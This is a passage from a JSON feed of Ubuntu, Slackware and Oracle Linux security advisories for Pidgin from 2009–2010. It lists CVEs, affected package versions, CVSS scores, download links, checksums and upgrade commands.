"Ubuntu", "OSVersion": "8.04", "packageVersion": "1:2.4.1-1ubuntu2.9", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}], "description": "Fabian Yamaguchi discovered that Pidgin incorrectly validated all fields of an incoming message in the MSN protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash, leading to a denial of service. (CVE-2010-0277)\n\nSadrul Habib Chowdhury discovered that Pidgin incorrectly handled certain nicknames in Finch group chat rooms. A remote attacker could use a specially crafted nickname and cause Pidgin to crash, leading to a denial of service. (CVE-2010-0420)\n\nAntti Hayrynen discovered that Pidgin incorrectly handled large numbers of smileys. A remote attacker could send a specially crafted message and cause Pidgin to become unresponsive, leading to a denial of service. (CVE-2010-0423)", "edition": 1, "reporter": "Ubuntu", "published": "2010-02-22T00:00:00", "type": "ubuntu", "title": "Pidgin vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2010-02-22T00:00:00", "href": "https://usn.ubuntu.com/902-1/", "id": "USN-902-1", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-03-29T18:17:31", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3711", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-1624"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "1:2.6.2-1ubuntu7.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "1:2.4.1-1ubuntu2.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "1:2.7.3-1ubuntu3.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "1:2.6.6-1ubuntu4.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}], "description": "Pierre Nogu\u00e8s discovered that Pidgin incorrectly handled malformed SLP messages in the MSN protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-1624)\n\nDaniel Atallah discovered that Pidgin incorrectly handled the return code of the Base64 decoding function. A remote attacker could send a specially crafted message and cause Pidgin to crash, leading to a denial of service. (CVE-2010-3711)", "edition": 1, "reporter": "Ubuntu", "published": "2010-11-04T00:00:00", "type": "ubuntu", "title": "Pidgin vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-1624", "CVE-2010-3711"], "modified": "2010-11-04T00:00:00", "href": "https://usn.ubuntu.com/1014-1/", "id": "USN-1014-1", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-03-29T18:19:46", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3085", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-2703", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0013", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3615", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-1376", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-2955", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3083", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-3026"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "1:2.5.2-0ubuntu1.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "1:2.5.5-1ubuntu8.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "1:2.4.1-1ubuntu2.8", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "1:2.6.2-1ubuntu7.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pidgin", "operator": "lt"}], "description": "It was discovered that Pidgin did not properly handle certain topic messages in the IRC protocol handler. If a user were tricked into connecting to a malicious IRC server, an attacker could cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.04 LTS, Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-2703)\n\nIt was discovered that Pidgin did not properly enforce the \u201crequire TLS/SSL\u201d setting when connecting to certain older Jabber servers. If a remote attacker were able to perform a man-in-the-middle attack, this flaw could be exploited to view sensitive information. This issue only affected Ubuntu 8.04 LTS, Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-3026)\n\nIt was discovered that Pidgin did not properly handle certain SLP invite messages in the MSN protocol handler. A remote attacker could send a specially crafted invite message and cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.04 LTS, Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-3083)\n\nIt was discovered that Pidgin did not properly handle certain errors in the XMPP protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-3085)\n\nIt was discovered that Pidgin did not properly handle malformed contact-list data in the OSCAR protocol handler. A remote attacker could send specially crafted contact-list data and cause Pidgin to crash, leading to a denial of service. (CVE-2009-3615)\n\nIt was discovered that Pidgin did not properly handle custom smiley requests in the MSN protocol handler. A remote attacker could send a specially crafted filename in a custom smiley request and obtain arbitrary files via directory traversal. This issue only affected Ubuntu 8.10, Ubuntu 9.04 and Ubuntu 9.10. (CVE-2010-0013)\n\nPidgin for Ubuntu 8.04 LTS was also updated to fix connection issues with the MSN protocol.\n\nUSN-675-1 and USN-781-1 provided updated Pidgin packages to fix multiple security vulnerabilities in Ubuntu 8.04 LTS. The security patches to fix CVE-2008-2955 and CVE-2009-1376 were incomplete. This update corrects the problem. Original advisory details:\n\nIt was discovered that Pidgin did not properly handle file transfers containing a long filename and special characters in the MSN protocol handler. A remote attacker could send a specially crafted filename in a file transfer request and cause Pidgin to crash, leading to a denial of service. (CVE-2008-2955)\n\nIt was discovered that Pidgin did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. (CVE-2009-1376)", "edition": 1, "reporter": "Ubuntu", "published": "2010-01-18T00:00:00", "type": "ubuntu", "title": "Pidgin vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-3085", "CVE-2009-3083", "CVE-2009-1376", "CVE-2009-3026", "CVE-2010-0013", "CVE-2009-2703", "CVE-2009-3615", "CVE-2008-2955"], "modified": "2010-01-18T00:00:00", "href": "https://usn.ubuntu.com/886-1/", "id": "USN-886-1", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2018-02-02T18:11:34", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.6.6", "arch": "i486", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-i486-1_slack13.0.txz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.1", "packageVersion": "2.6.6", "arch": "i486", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-i486-1_slack12.1.tgz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.2", "packageVersion": "2.6.6", "arch": "i486", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-i486-1_slack12.2.tgz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.0", "packageVersion": "2.6.6", "arch": "i486", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-i486-1_slack12.0.tgz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.6.6", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-2.6.6-x86_64-1_slack13.0.txz", "operator": "lt"}], "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, 13.0,\nand -current to fix denial of service issues.\n\nMore details about the issues may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0277\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0420\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0423\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/pidgin-2.6.6-i486-1_slack13.0.txz: Upgraded.\n This fixes a few denial-of-service flaws as well as other bugs.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0277\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0420\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0423\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.6.6-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.6.6-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.6.6-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/pidgin-2.6.6-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/pidgin-2.6.6-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.6.6-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.6.6-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\nab0bdf3a3de12e14973e603f812cb0de pidgin-2.6.6-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nf84d789da03ce5e6481c9e04481913a6 pidgin-2.6.6-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n788ed01f917aa0bfca365e9f77a3490e pidgin-2.6.6-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\nc8456f8e3c9fb456afcb49871c557e9f pidgin-2.6.6-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n80baaeb8cb042fab6c9764b491c3ebd1 pidgin-2.6.6-x86_64-1_slack13.0.txz\n\nSlackware -current package:\n5ddf6032d36ba29d5ae14ecaedbab88f pidgin-2.6.6-i486-1.txz\n\nSlackware x86_64 -current package:\n451919ccd63ef9aa4245dbe1afb27587 pidgin-2.6.6-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.6.6-i486-1_slack13.0.txz", "edition": 1, "reporter": "Slackware Linux Project", "published": "2010-03-10T18:17:44", "title": "pidgin", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2010-03-10T18:17:44", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.458630", "id": "SSA-2010-069-01", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-02-02T18:11:29", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "12.2", "packageVersion": "2.7.0", "arch": "i486", "packageName": "pidgin", "packageFilename": "pidgin-2.7.0-i486-1_slack12.2.tgz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.1", "packageVersion": "2.7.0", "arch": "i486", "packageName": "pidgin", "packageFilename": "pidgin-2.7.0-i486-1_slack12.1.tgz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.7.0", "arch": "i486", "packageName": "pidgin", "packageFilename": "pidgin-2.7.0-i486-1_slack13.0.txz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.0", "packageVersion": "2.7.0", "arch": "i486", "packageName": "pidgin", "packageFilename": "pidgin-2.7.0-i486-1_slack12.0.tgz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.7.0", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-2.7.0-x86_64-1_slack13.0.txz", "operator": "lt"}], "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, 13.0,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/pidgin-2.7.0-i486-1_slack13.0.txz: Upgraded.\n Upgraded to pidgin-2.7.0 and pidgin-encryption-3.1.\n The msn_emoticon_msg function in slp.c in the MSN protocol plugin in\n libpurple in Pidgin before 2.7.0 allows remote attackers to cause\n a denial of service (application crash) via a custom emoticon in a\n malformed SLP message.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1624\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.7.0-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.7.0-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.7.0-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/pidgin-2.7.0-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/pidgin-2.7.0-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.7.0-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.7.0-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\nb988b50b9eacdb945e23f87d727cd9ea pidgin-2.7.0-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n18d32120919d0042d370813ab90a7d1d pidgin-2.7.0-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\nd3686755cf78d1f1b1c0e61663325c5f pidgin-2.7.0-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\n80002e97f1979c926b2a5c72ef7e4847 pidgin-2.7.0-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n03ac23f92b3884911718a9e4fce8d3b3 pidgin-2.7.0-x86_64-1_slack13.0.txz\n\nSlackware -current package:\n2573c594996ef632e013a0ffcb95fe75 pidgin-2.7.0-i486-1.txz\n\nSlackware x86_64 -current package:\nb65ac72c257d0fa7b82728030a79bb36 pidgin-2.7.0-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.7.0-i486-1_slack13.0.txz", "edition": 1, "reporter": "Slackware Linux Project", "published": "2010-05-18T16:13:01", "title": "pidgin", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-1624"], "modified": "2010-05-18T16:13:01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.441227", "id": "SSA-2010-138-01", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-02-02T18:11:28", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "12.2", "packageVersion": "2.6.5", "arch": "i486", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-i486-1_slack12.2.tgz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.0", "packageVersion": "2.6.5", "arch": "i486", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-i486-1_slack12.0.tgz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.6.5", "arch": "x86_64", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-x86_64-1_slack13.0.txz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.1", "packageVersion": "2.6.5", "arch": "i486", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-i486-1_slack12.1.tgz", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.6.5", "arch": "i486", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-i486-1_slack13.0.txz", "operator": "lt"}], "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, 13.0,\nand -current to fix a security issue.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/pidgin-2.6.5-i486-1_slack13.0.txz : Upgraded.\n This fixes a directory traversal vulnerability in Pidgin's MSN protocol\n handling that may allow attackers to download arbitrary files.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.6.5-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.6.5-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.6.5-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/pidgin-2.6.5-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/pidgin-2.6.5-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.6.5-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.6.5-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\n1d779642ef1728ee115d0159803ffce7 pidgin-2.6.5-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n24e6a95472e15299f16ad137ca92c568 pidgin-2.6.5-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\nd5186bf297d9647f08e4ff8b8d3496e5 pidgin-2.6.5-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\nb73f234503067324f5a16bc1686d0192 pidgin-2.6.5-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n6ae919fbbfc06731d4b83a9ff65f88a8 pidgin-2.6.5-x86_64-1_slack13.0.txz\n\nSlackware -current package:\nda2ea9b466c31521cf3857fc6998cb4c pidgin-2.6.5-i486-1.txz\n\nSlackware x86_64 -current package:\n362a93381a225db704749b4249013731 pidgin-2.6.5-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.6.5-i486-1_slack13.0.txz", "edition": 1, "reporter": "Slackware Linux Project", "published": "2010-01-24T21:20:22", "title": "pidgin", "type": "slackware", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0013"], "modified": "2010-01-24T21:20:22", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.443459", "id": "SSA-2010-024-03", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-02-02T18:11:37", "references": [], "affectedPackage": [{"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.7.3", "arch": "i486", "packageFilename": "pidgin-2.7.3-i486-1_slack13.0.txz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.2", "packageVersion": "2.7.3", "arch": "i486", "packageFilename": "pidgin-2.7.3-i486-1_slack12.2.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.0", "packageVersion": "2.7.3", "arch": "x86_64", "packageFilename": "pidgin-2.7.3-x86_64-1_slack13.0.txz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.1", "packageVersion": "2.7.3", "arch": "i486", "packageFilename": "pidgin-2.7.3-i486-1_slack12.1.tgz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "2.7.3", "arch": "i486", "packageFilename": "pidgin-2.7.3-i486-1_slack13.1.txz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "13.1", "packageVersion": "2.7.3", "arch": "x86_64", "packageFilename": "pidgin-2.7.3-x86_64-1_slack13.1.txz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Slackware", "OSVersion": "12.0", "packageVersion": "2.7.3", "arch": "i486", "packageFilename": "pidgin-2.7.3-i486-1_slack12.0.tgz", "packageName": "pidgin", "operator": "lt"}], "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\nand -current to fix security issues.\n\nHere are the details from the Slackware 13.1 ChangeLog:\n\npatches/packages/pidgin-2.7.3-i486-1_slack13.1.txz: Upgraded.\n This fixes a crash due to malformed X-Status messages.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2528\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.7.3-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.7.3-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.7.3-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/pidgin-2.7.3-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/pidgin-2.7.3-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/pidgin-2.7.3-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/pidgin-2.7.3-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.7.3-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.7.3-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\nfb7245579aa4015f005d0044aeb7fd52 pidgin-2.7.3-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nba4084ade603a89b4e90e46bcd0c2b23 pidgin-2.7.3-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n5f8e30a3bb04c445040b2b089fc6c04c pidgin-2.7.3-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\n10bf842cd6588250ee109c336ab89990 pidgin-2.7.3-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\nb395ee451748d348a0eec5b92d939581 pidgin-2.7.3-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n16b7bdbe33fa6939b550913c1014680c pidgin-2.7.3-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\ne84ee7496de30290c1c379b17ce25e32 pidgin-2.7.3-x86_64-1_slack13.1.txz\n\nSlackware -current package:\ne55e0f4e6a656e50dfa01da2da847cd7 xap/pidgin-2.7.3-i486-1.txz\n\nSlackware x86_64 -current package:\ne33c22e97f622500be3b84cde060b503 xap/pidgin-2.7.3-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.7.3-i486-1_slack13.1.txz", "edition": 1, "reporter": "Slackware Linux Project", "published": "2010-08-28T09:53:14", "type": "slackware", "title": "pidgin", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-2528"], "modified": "2010-08-28T09:53:14", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2010&m=slackware-security.462873", "id": "SSA-2010-240-05", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2016-09-04T11:16:36", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-perl-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "finch-2.6.6-1.el4.ia64.rpm", "packageName": "finch", "arch": "ia64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-tcl-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple-tcl", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "finch-2.6.6-1.el4.i386.rpm", "packageName": "finch", "arch": "i386", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-2.6.6-1.el4.i386.rpm", "packageName": "pidgin", "arch": "i386", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-devel-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-2.6.6-1.el4.i386.rpm", "packageName": "libpurple", "arch": "i386", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-devel-2.6.6-1.el4.ia64.rpm", "packageName": "pidgin-devel", "arch": "ia64", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-2.6.6-1.el4.src.rpm", "packageName": "pidgin", "arch": "src", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": 